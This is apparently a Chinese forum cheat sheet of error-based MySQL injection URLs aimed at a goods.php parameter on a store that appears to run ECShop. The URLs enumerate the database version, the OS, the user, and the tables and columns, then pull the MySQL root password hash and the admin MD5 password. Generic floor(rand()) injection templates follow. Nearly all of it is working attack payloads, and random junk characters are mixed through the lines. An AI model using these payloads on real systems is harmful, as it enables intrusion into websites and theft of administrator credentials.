判断版本号
8 o% P% L, G( Hhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
9 e; x. U6 G8 w0 o
& {& Q/ d. d; i, c, n5 I0 ?0 ^判断系统7 A# p& _! N: \- f' t4 `5 L" E
9 ]# F% r2 H; d; Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
2 u9 G/ s) }8 d+ _9 k. k4 C% L! p3 `5 g* ^- ]: a4 d
, F) \ H# ~% S
$ O2 ` @ a; b, C9 T, l当前 user()8 O0 K6 C, k% n- Z! _& @
& W, Q- `6 j; |* Z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) J" O+ `5 [( H
2 b" \7 |1 V" c8 g5 F' _. g7 T
0 h' G8 \% F( e1 j. r4 ^1 N* W6 Y. U) U: I$ }9 M
当前 database()# S/ p' i" r. z! T' D0 o
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23. c+ s* Z. k5 s: K$ {
9 w: ~. l) Z+ F, i6 b; O3 {
' i: U6 c5 ]& I" E w, F
4 @8 r7 }. t8 b; l7 A5 c6 ]
# k' J; [! o: P9 U: g; \4 R4 Eroot hash
! z. C; w: N/ k" `. b2 F, P: O) }$ o8 C3 x; j( @0 X7 z
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23' `$ Z% r; g. Q! S5 A% Q; b
6 w6 o& a" r) u* ^; f+ @, \
" Z/ P6 l! b+ x7 v0 |1 h0 k5 b' a& f1 k6 Y
当前 数据库表名6 a8 _4 h `+ Q6 k! L: k& }8 j
3 S5 r* U. u: J, m' s
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: d0 X5 ] j4 L, a
* s- Z2 d8 J; x. X
1 e9 M2 [8 n! y: E4 j6 W
$ w& l- [+ O8 c4 G; l5 ?0 H3 \当前 数据库 user_name 字段4 ?9 Q/ S: a* Q, b1 z. @! O
2 t5 @- j- k) Ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, N9 Q j- \+ U$ ?- y
! x1 I' B7 b; K; t3 u: S
当前 数据库 字段 password
+ }! K& ]' i p ?& Zhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ h5 A" i- a; M6 O- [. U) ]* a. a
7 X0 f1 b' O. f- Q- C/ [0 X% E0 D
7 R& O7 V2 k! u, \获得 admin passwd(md5)4 B9 c5 w8 J: O. i n- z. ~, ~) P4 n
% O: V& S+ I; W$ s! C4 J4 J' h; V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 J$ E% N9 W) I5 l
^/ P3 z0 R3 U/ E
报错注射
7 ~) V1 o' X: t9 n0 kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)+ p( P$ [$ i# j8 `3 B2 y$ D! o# F
& b$ f9 e+ M7 p
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)1 u. @ k- {3 D1 {. C# j
+ U6 t) Q7 z l9 Y+ w" l. S
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |